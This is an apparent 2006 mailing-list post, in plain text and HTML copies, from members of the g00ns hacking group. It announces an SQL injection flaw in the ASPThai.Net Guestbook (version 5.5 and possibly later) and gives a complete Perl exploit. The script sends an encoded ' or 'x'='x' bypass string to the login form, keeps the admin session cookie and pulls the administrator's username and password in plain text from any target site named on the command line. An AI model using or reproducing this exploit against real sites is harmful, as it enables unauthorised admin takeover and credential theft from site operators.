------=_Part_9669_22649246.1139201383091
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inlineI MurderSkillz from g00ns.net found a vuln "SQL Injection Exploit for
ASPThai.Net Guestbook <=3D 5.5 and POSSIBLY higher" The sql injection takes
place in admin.asp. IF injected with special characters into the login it
will grant u with admin..BUT we wrote wrote some code to grab plaintext use=
r
and pass..here is the code
#!/usr/bin/perl
# SQL Injection Exploit for ASPThai.Net Guestbook <=3D 5.5
#(And possible higher could not find a site to test it on)
# This exploit shows the username of the administrator and the password In
plain text
# Bug Found by muderskillz Coded by Zodiac
# Shouts to cijfer,uid0,|n|ex,ph4tel,z3r0,lethal, Felosi,seven,Spic and
anyone else I forgot.
# http://exploitercode.com/ http://www.g00ns.net
#irc.g00ns.net #g00ns email =3D zodiac@g00ns.net
#(c) 2006
use LWP::UserAgent;
use HTTP::Cookies;
$Server =3D $ARGV[0];
if($Server =3D~m/http/g)
{
$Server=3D~ 'http://$Server';
print
}
else {
print $error;
}
if(!$Server) {usage();exit() ;}
head();
print "\r\nGrabbing Username And Password\r\n\n";
#Login's and stores a cookie to view admin panel later
$xpl =3D LWP::UserAgent->new() or die;
$cookie_jar =3D HTTP::Cookies->new();
$xpl->agent('g00ns');
$xpl->cookie_jar($cookie_jar);
$res =3D $xpl->post(
$Server.'check_user.asp',
Content =3D> [
'txtUserName' =3D> '\' or \'%67%30%30%6e%73\'=3D\'%67%30%30%6e%73',
'txtUserPass' =3D> '\' or \'%67%30%30%6e%73\'=3D\'%67%30%30%6e%73',
'Submit' =3D> '-=3D Login =3D-',
],
);
# Create a request
my $req =3D HTTP::Request->new(GET =3D>
$Server.'change_admin_username.asp'
);
$req->header('Referer', $Server.'admin_menu.asp');
my $res =3D $xpl->request($req);
$info=3D $res->content;
if($info =3D~ m/Unauthorised\sAccess|The\spage\scannot\sbe\sfound/)
{
die "Error Connecting...\r\n";
}
#Check the outcome of the response
$info=3D~m/(value=3D\")(\n+|\w+|\W+)/g;
$User =3D $2;
$info=3D~m/(value=3D\")(\n+|\w+|\W+)/g;
$Pass=3D $2;
print "UserName:$User\r\nPassword:$Pass\r\n";
sub head()
{
print
"\n=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\r\n";
print "* ASPThai.Net Guestbook version 5.5 SQL Injection by
www.g00ns.net*\r\n";
print
"=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\r\n";
}
sub usage()
{
head();
print " Usage: Thaisql.pl <Site> \r\n\n";
print " <Site> - Full path to Guestbook e.g.
http://www.site.com/guestbook/\r\n";
print
"=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\r\n";
print " -=3DCoded by Zodiac, Bug Found by MurderSkillz=3D-\r\n";
print "www.exploitercode.com www.g00ns.net irc.g00ns.net #g00ns\r\n";
print
"=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\r\n";
exit();
}
its been out for like 2 days now..
------=_Part_9669_22649246.1139201383091
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
<div>I MurderSkillz from <a href=3D"http://g00ns.net">g00ns.net</a> found a=
vuln "SQL Injection Exploit for ASPThai.Net Guestbook <=3D 5.5 and=
POSSIBLY higher" The sql injection takes place in admin.asp. IF injec=
ted with special characters into the login it will grant u with admin..BUT =
we wrote wrote some code to grab plaintext user and pass..here is the code
</div>
<div> </div>
<div>
<p>#!/usr/bin/perl<br># SQL Injection Exploit for ASPThai.Net Guestbook <=
;=3D 5.5 <br>#(And possible higher could not find a site to test it o=
n)<br># This exploit shows the username of the administrator and the passwo=
rd In plain text
<br># Bug Found by muderskillz Coded by Zodiac<br># Shouts to cijfer,uid0,|=
n|ex,ph4tel,z3r0,lethal, Felosi,seven,Spic and anyone else I forgot.<br># <=
a href=3D"http://exploitercode.com/">http://exploitercode.com/</a> <a href=
=3D"http://www.g00ns.net/">
http://www.g00ns.net</a> <br>#irc.g00ns.net #g00ns email =3D <a href=
=3D"mailto:zodiac@g00ns.net">zodiac@g00ns.net</a><br>#(c) 2006</p>
<p>use LWP::UserAgent;<br>use HTTP::Cookies;</p>
<p><br>$Server =3D $ARGV[0];</p>
<p>if($Server =3D~m/http/g)<br>{<br>$Server=3D~ 'http://$Server';<br>print =
<br>}</p>
<p>else {<br> print $error;<br>}</p>
<p> </p>
<p><br>if(!$Server) {usage();exit() ;}</p>
<p>head();</p>
<p> </p>
<p>print "\r\nGrabbing Username And Password\r\n\n";</p>
<p> </p>
<p>#Login's and stores a cookie to view admin panel later</p>
<p><br> $xpl =3D LWP::UserAgent->new() or die;<br> $cookie_jar=
=3D HTTP::Cookies->new();</p>
<p> $xpl->agent('g00ns');<br> $xpl->cookie_jar($cookie_jar)=
;</p>
<p> $res =3D $xpl->post(<br> $Server.'check_user.asp',<br>&nbs=
p;Content =3D> [ </p>
<p><br> 'txtUserName' =3D> '\' or \'%67%30%30%6e%73\'=3D\'%67%30%30=
%6e%73', <br> 'txtUserPass' =3D> '\' or \'%67%30%30%6e%73\'=3D\'%67=
%30%30%6e%73',<br> 'Submit' =3D> '-=3D Login =3D-',<br> ],<br>=
);</p>
<p> </p>
<p># Create a request<br>my $req =3D HTTP::Request->new(GET =3D> </p>
<p>$Server.'change_admin_username.asp'</p>
<p>);</p>
<p>$req->header('Referer', $Server.'admin_menu.asp');</p>
<p> </p>
<p>my $res =3D $xpl->request($req);</p>
<p>$info=3D $res->content;</p>
<p>if($info =3D~ m/Unauthorised\sAccess|The\spage\scannot\sbe\sfound/) <br>=
{ <br> die "Error Connecting...\r\n"; <br>}</p>
<p> </p>
<p><br>#Check the outcome of the response</p>
<p> </p>
<p>$info=3D~m/(value=3D\")(\n+|\w+|\W+)/g;<br>$User =3D $2;<br>$info=
=3D~m/(value=3D\")(\n+|\w+|\W+)/g;<br>$Pass=3D $2;</p>
<p><br>print "UserName:$User\r\nPassword:$Pass\r\n";</p>
<p> </p>
<p>sub head()<br> {<br> print "\n=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\r\n";<br> print "* ASPT=
hai.Net Guestbook version 5.5 SQL Injection by <a href=3D"http://www.g00ns.=
net/">
www.g00ns.net</a> *\r\n"; <br> print "=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\r\n";<br> =
}<br>sub usage()<br> {<br> head();<br> print " Usage: T=
haisql.pl <Site> \r\n\n";
<br> print " <Site> - Full path to Guestbook e.g. <a href=
=3D"http://www.site.com/guestbook/">http://www.site.com/guestbook/</a> \r\n=
";<br> print "=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D\r\n";
<br> print " -=3DCoded by Zodiac, Bug Found by Murder=
Skillz=3D-\r\n";<br> print "<a href=3D"http://www.exploiterc=
ode.com/">www.exploitercode.com</a> <a href=3D"http://www.g00ns.net/">www.g=
00ns.net</a> <a href=3D"http://irc.g00ns.net">
irc.g00ns.net</a> #g00ns\r\n";<br> print "=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\r\n";<br> exit();<b=
r> }</p>
<p> </p>
<p>its been out for like 2 days now..<br> </p></div>
------=_Part_9669_22649246.1139201383091--
推荐
评论(0条)
